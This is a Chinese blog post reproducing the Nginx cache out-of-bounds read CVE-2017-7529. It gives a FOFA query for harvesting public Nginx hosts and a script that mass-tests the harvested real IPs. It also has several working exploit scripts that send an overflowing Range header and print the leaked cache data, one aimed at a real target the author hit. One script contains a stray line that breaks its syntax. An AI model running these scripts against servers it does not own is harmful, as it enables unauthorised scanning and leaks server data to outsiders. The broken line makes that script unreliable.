0x07 Nginx越界读取缓存漏洞 CVE-2017-7529 复现

于 2024-09-12 01:40:35 发布
阅读量226 收藏 2
点赞数 3
分类专栏: 漏洞库 文章标签: 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43263566/article/details/142154196
版权

参考:

一、fofa 搜索

nginx && port="80"

我这里写了个脚本将ip保存下来,搜索ip脚本的编写教程:Python教程:如何用Python编写FOFA爬虫获取信息?_fofa python-CSDN博客

 

二、漏洞复现

漏洞poc

#!/usr/bin/env python
import sys
import requests

if len(sys.argv) < 2:
    print("%s url" % (sys.argv[0]))
    print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
    sys.exit()

headers = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (
    n, 0x8000000000000000 - n)

r = requests.get(url, headers=headers)

我根据poc重写了脚本,读取本地的ip.txt文件进行验证漏洞

#!/usr/bin/env python
import requests

def check_vulnerability(url):
    """
    检查给定的URL是否存在漏洞,根据响应内容进行判断。

    参数:
        url (str): 需要检查漏洞的URL。

    返回:
        bool: 如果存在漏洞返回True,否则返回False。
    """
    headers = {
        'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
    }
    offset = 605  # 调整字节范围的偏移量
    try:
        # 发起初始请求以获取响应内容长度
        response = requests.get(url, headers=headers, timeout=10)
        file_len = len(response.content)
        n = file_len + offset

        # 设置Range头部以请求特定的字节范围
        headers['Range'] = "bytes=-%d,-%d" % (n, 0x8000000000000000 - n)
        r = requests.get(url, headers=headers, timeout=10)

        # 检查响应是否指示存在漏洞(例如,状态码206且内容非空)
        if r.status_code == 206 and r.content:
            return True
    except requests.RequestException as e:
        # 静默处理请求异常
        pass
        # print(f"请求错误: {e}")
    return False

def main():
    """
    主函数,从文件中读取URL并检查每个URL是否存在漏洞。
    """
    # 打开包含URL的文件
    with open('ip.txt', 'r') as file:
        urls = [line.strip() for line in file]

    # 检查每个URL是否存在漏洞
    for url in urls:
        # print(f"正在验证的URL: {url}")
        if check_vulnerability(url):
            print(f"验证成功的URL: {url}")

if __name__ == "__main__":
    main()

 

三、利用漏洞

poc

import requests
import urllib3

def cve20177529():
    try:
        # 构造请求头
        headers = {
            'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
        }
        url = 'http://127.0.0.1:8080/'

        # 获取正常响应的返回长度

        # verify=False防止ssl证书校验,allow_redirects=False,防止跳转导致误报的出现
        r1 = requests.get(url, headers=headers, verify=False, allow_redirects=False)
        url_len = len(r1.content)

        # 将数据长度加长,大于返回的正常长度

        addnum = 320
        final_len = url_len + addnum

        # 构造Range请求头,并加进headers中

        # headers['Range'] = "bytes=-%d参考资料,-%d" % (final_len, 0x8000000000000000-final_len)
0x8000000000000000
        headers = {
            'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36",
            'Range': "bytes=-%d,-%d" % (final_len, 0x8000000000000000 - final_len)
        }

        # 用构造的新的headers发送请求包,并输出结果

        r2 = requests.get(url, headers=headers, verify=False, allow_redirects=False)
        text = r2.text
        code = r2.status_code
        print(code)#打印状态码
        print(text)#打印响应

    except Exception as result:
        print(result)


if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    cve20177529()

 我用这个poc遇到目标进行302重定向没有获取到目标信息,然后我又改了一下

import requests
import urllib3

def cve20177529():
    """
    检查特定URL是否存在CVE-2017-7529漏洞。
    """
    try:
        # 构造请求头,模拟浏览器访问
        headers = {
            'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
        }
        url = 'http://xxxx'  # 目标URL

        # 发起初始请求以获取响应内容长度
        r1 = requests.get(url, headers=headers, verify=False, allow_redirects=True)
        url_len = len(r1.content)

        # 设置范围增量
        addnum = 320
        final_len = url_len + addnum

        # 构造带有Range头部的请求
        headers['Range'] = "bytes=-%d,-%d" % (final_len, 0x8000000000000000 - final_len)

        # 发送带有Range头部的请求
        r2 = requests.get(url, headers=headers, verify=False, allow_redirects=True)
        text = r2.text
        code = r2.status_code

        # 输出响应状态码和内容
        print(f"Status Code: {code}")
        print("Response Body:")
        print(text)

    except Exception as e:
        # 捕捉并输出异常信息
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    # 禁用SSL警告
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    # 调用检查函数
    cve20177529()

状态码 206 表示“部分内容”(Partial Content),通常是在服务器处理了部分范围请求时返回的。

 

狗蛋的博客之旅
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Nginx越界读取缓存漏洞 CVE-2017-7529 漏洞复现
ADummy的博客
02-25 1381
Nginx越界读取缓存漏洞CVE-2017-7529) by ADummy 0x00利用路线 ​ POC验证—>读取缓存文件中位于“http返回包体”前的“文件头”、“http返回包头”等内容 0x01漏洞介绍 ​ Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。 如果我的请求
Nginx越界读取缓存漏洞CVE-2017-7529
qq_58000413的博客
09-21 1790
在一个 Range 首部中,可以一次性请求多个部分,服务器会以 multipart 文件的形式将其返回。Nginx越界读取缓存漏洞CVE-2017-7529复现分析 漏洞概述 ​在 Nginx 的 range filter 中存在整数溢出漏洞,可以通过带有特殊构造的 range 的 HTTP 头的。主要是因为在通过range读取缓存的时候,当我们构造了两个负值得位置,则我们可以读取缓存文件中比敏感的服务器信息。漏洞复现-CVE-2017-7529-敏感信息泄露 - 铺哩 - 博客园。
Nginx越界读取缓存漏洞分析CVE-2017-7529
qq_43571759的博客
04-22 698
CVE-2017-7529 Nginx越界读取缓存漏洞 Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。 漏洞分析 如果我的请求中包含Range头,Nginx将会根据我指定的sta...
Vulhub中Nginx系列之CVE-2013-4547、CVE-2017-7529、Insecure-configuration、nginx_parsing_vulne 漏洞复现
weixin_41438728的博客
11-30 2141
Nginx系列漏洞复现一、Nginx 文件名逻辑漏洞CVE-2013-4547 )漏洞复现影响版本漏洞说明漏洞利用漏洞修复Nginx越界读取缓存漏洞CVE-2017-7529漏洞复现影响版本漏洞说明概念介绍漏洞利用漏洞修复配置错误导致漏洞(insecure-configuration )影响版本影响说明1、CRLF注入漏洞Mistake 1. CRLF注入漏洞2、目录穿越漏洞3、add_header被覆盖nginx_parsing_vulnerability 一、Nginx 文件名逻辑漏洞CVE-
Nginx服务漏洞复现
m0_62389190的博客
08-10 1874
绕过服务器策略,上传webshell。
nginx中间件漏洞复现
kukudeshuo的博客
02-22 6544
nginx中间件漏洞复现 nginx介绍 Nginx (engine x) 是一个高性能的HTTP和反向代理web服务器,同时也提供了IMAP/POP3/SMTP服务。Nginx是由伊戈尔·赛索耶夫为俄罗斯访问量第二的Rambler.ru站点(俄文:Рамблер)开发的,第一个公开版本0.1.0发布于2004年10月4日。 其将源代码以类BSD许可证的形式发布,因它的稳定性、丰富的功能集、简单的配置文件和低系统资源的消耗而闻名。2011年6月1日,nginx 1.0.4发布。 Nginx是一款轻量级的We
nginx漏洞复现
赵花花08042的博客
12-13 1718
vulhub漏洞环境 https://vulhub.org/#/environments/nginx/nginx_parsing_vulnerability/ Nginx 解析漏洞复现 版本信息: Nginx 1.x 最新版 PHP 7.x最新版 该漏洞Nginx、php版本无关,属于用户配置不当造成的解析漏洞。 1、由于nginx.conf的错误配置导致nginx把以".php"结尾的文件交给fastcgi处理,为此可以构造http://172.168.30.190/uploadfiles/ha
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将...
Nginx越界读取缓存漏洞复现CVE-2017-7529
qq_34853514的博客
07-26 469
漏洞简介 漏洞编号: CVE-2017-15715 漏洞影响范围: Nginx version 0.5.6 - 1.13.2 漏洞原理: Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我
14_L3缓存友好的数据结构
刘炫320的博客
09-11 475
老鸟:L3缓存是CPU缓存层次结构中的第三层,通常比L1和L2缓存大,但访问速度稍慢。L3缓存友好的数据结构设计旨在最大限度地减少缓存未命中,从而提升性能。菜鸟:那这些数据结构有什么特点呢?老鸟:主要特点是数据局部性好,也就是说,数据在内存中是连续存储的,这样能更好地利用缓存行。我们可以从一个简单的例子开始,比如数组和链表的对比。老鸟:总结一下,L3缓存友好的数据结构通过提升数据局部性来提高性能。常见的有数组、等。它们在大数据处理和高性能计算中非常有用。但在实际应用中,需要权衡性能、可维护性和具体需求。
阿里短信服务+Redis创建定时缓存
dys000000的博客
09-11 299
在这一章进行的操作是在java中引入阿里云的短信服务接口,在发送短信的时候将短信存进Redis缓存数据库中并且对缓存数据添加倒计时为五分钟将下方图示内容全部复制到java中, 创建一个新的.class文件 将下面内容复制进去即可之后将下方内容添进去注意将需要修改的地方修改为自己的下面根据下方所说对上面复制的接口代码进行修改1. CodeAPPCode 需要先登录 之后免费使用(购买)之后即可。
【智能排班系统】缓存组件封装
记录一名在读研究生的学习笔记、感悟、开发产物
09-08 1378
本文档阐述了缓存在提升软件性能与用户体验方面的关键作用,重点讨论了封装缓存组件的设计理念与实践。文档中详述了如何通过配置文件设定Redis缓存的基本属性,如超时时间和时间单位,并引入布隆过滤器来有效预防缓存穿透问题。同时,提供了多种安全获取与存储缓存的方法签名,旨在通过多层次的安全措施应对缓存穿透、击穿及雪崩等常见问题,确保系统的稳定运行。
基于准静态自适应环型缓存器(QSARC)的taskBus万兆吞吐实现
丁劲犇技术发布空间
09-08 991
准静态自适应环形缓存器(Quasi-Static Adaptive Ring Cache)是taskBus用于数据吞吐的软件技术。使用该缓存器,基于EPDR的业余软线无线电平台taskBus可在Linux 系统 i7 6700K 4GHz下达到3GBps(24Gbps)的总交换能力。该交换能力被各个通道均分,共同支撑taskBus平台按照工程的连接关系,把各个生产者产出的数据包及时、完整、有序地输送给消费者。当然,这种架构存在木桶效应,且仍旧距离挑战吞吐能力极限有很大距离。
Vue/cli不同环境下打包后js文件没有添加hash值-会导致缓存问题-解决
JackieDYH的博客
09-09 183
值,所以在配置不同环境对应命令的时候,把NODE_ENV='production'加上。包文件判断是根据NODE_ENV='production',这时会对应打包加上。process.env.VUE_APP_ENV 会读取不到值。全局的环境变量需要以VUE_APP_ 开头。
Redis学习——数据不一致怎么办?更新缓存失败了又怎么办?
Blackoutdragon的博客
09-11 707
不总结不知道,之前知道的太浅薄了,关于redis了解的不够深刻,实际上数据不一致不仅仅是删除或者更新缓存那么简单,中间还会涉及到多线程的问题,因为多个更新数据库和删除缓存并不具有原子性,中间有可能被打断,所以需要分情况进行讨论。 出现数据不一致的情况的以及对应的解决方式有两种,具体如下 数据不一致原因 解决办法 删除redis执行失败 消息队列重试 多线程导致数据不一致 延迟双删策略
如何解决缓存(redis)和数据库(MySQL)数据不一致的问题?
jkzyx123的博客
09-08 1539
如何解决缓存(redis)和数据库(MySQL)数据不一致的问题?
黑马点评19——多级缓存-缓存同步
最新发布
shall_zhao的博客
09-11 668
在多级缓存中的数据一致性问题,也就是缓存同步的问题。
nginx 越界写入漏洞CVE-2022-41742)
05-19
CVE-2022-41742是针对Nginx越界写入漏洞,该漏洞可能导致攻击者在特定环境下执行任意代码或导致拒绝服务攻击。该漏洞影响版本为Nginx 1.21.0至1.21.2。 攻击者可以通过构造特定的HTTP请求,利用该漏洞来进行攻击。Nginx已经发布了针对该漏洞的修复版本,建议用户尽快升级到最新版本以避免受到攻击。 同时,为了减少风险,管理员还应该采取其他安全措施,包括但不限于: 1. 使用防火墙来限制对Nginx的访问; 2. 启用Nginx的访问日志和错误日志,及时发现异常情况; 3. 防止未经授权的用户访问服务器; 4. 及时备份数据,以便在攻击发生时能够迅速恢复数据。 总之,针对该漏洞,用户需要采取一系列安全措施来保护自己的系统不受攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

狗蛋的博客之旅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值